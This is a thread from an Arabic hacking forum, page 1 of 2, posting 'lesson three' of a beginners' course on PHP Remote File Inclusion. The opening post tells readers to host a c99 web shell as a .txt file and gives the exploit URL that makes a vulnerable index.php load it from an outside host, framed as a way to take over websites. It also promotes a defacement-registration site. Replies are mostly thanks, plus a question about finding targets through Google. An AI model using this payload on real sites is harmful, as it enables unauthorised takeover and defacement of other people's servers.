الدرس الثالث (دينامكية عمل Remote File include)

الدرس الثالث (دينامكية عمل Remote File include)


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: الدرس الثالث (دينامكية عمل Remote File include)

  1. #1

    Momayz الدرس الثالث (دينامكية عمل Remote File include)

    السلام عليكم ورحمة الله وبركاته



    وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))

    كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر

    الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي

    هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا

    كود PHP:
    www.site.com/index.php?id=main.html 
    هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html

    ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع

    والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt

    مثلا هذا الشل


    كود PHP:
    http://www.c99.mobi/c99.txt 
    نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id

    وطريقة كتابة الإستغلال هي


    كود PHP:
    www.site.com/index.php?id=http://www.c99.mobi/c99.txt? 
    مع وضع علامة الـ ؟ في نهاية رابط الشل

    واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء

    فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى

    الى هن ننهي الشرح
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2
    هكر مبتديء الصورة الرمزية موج الأحزان
    تاريخ التسجيل
    Jul 2009
    الدولة
    ksa-الدمام
    المشاركات
    29

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    صدقت يالغالي

    هالثغرهـ

    على ايام الفراعنه
    انتظرووووني قريباً

  3. #3

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    شــــرح وافـــــــــي

    واصل من غير فاصل

  4. #4

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكور يا غالي

  5. #5

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكور يا غالي

  6. #6

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    how can i find it in google

  7. #7

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    شكرا أخي والله هدا الدرس مفيد لاكن إن لم يضهر الشل بمادا تنصحنا كمبتدئين ؟؟؟

  8. #8

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكوووووووووووووووووووووو وووووووووووووووووور

  9. #9

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكوووووووووووووووووووووو وووووووووووووووووور يا غالي

  10. #10

    افتراضي رد: الدرس الثالث (دينامكية عمل Remote File include)

    مشكور يا اسد
    MaKaVeLi

    www.aljyyosh.com

    HackE WeB SiT /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 80%

    HackE Pc /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 75%

    HackE EmaiL /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 30%

    SpameR /-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 70%

    Email [email protected] = conect 100%

    Email [email protected] = conect 20%

    Email [email protected] = conect 15%



صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 04:32 PM
  2. رفع الشيل عبر ثغرات remote file include
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 45
    آخر مشاركة: 03-16-2012, 09:13 PM
  3. كيفيه اكتشاف ثغرات Local File Include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 41
    آخر مشاركة: 03-16-2012, 09:05 PM
  4. الدرس الخامس (دينامكية عمل ثغرة Remote Upload Vulnerability)
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 1
    آخر مشاركة: 07-22-2009, 04:24 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •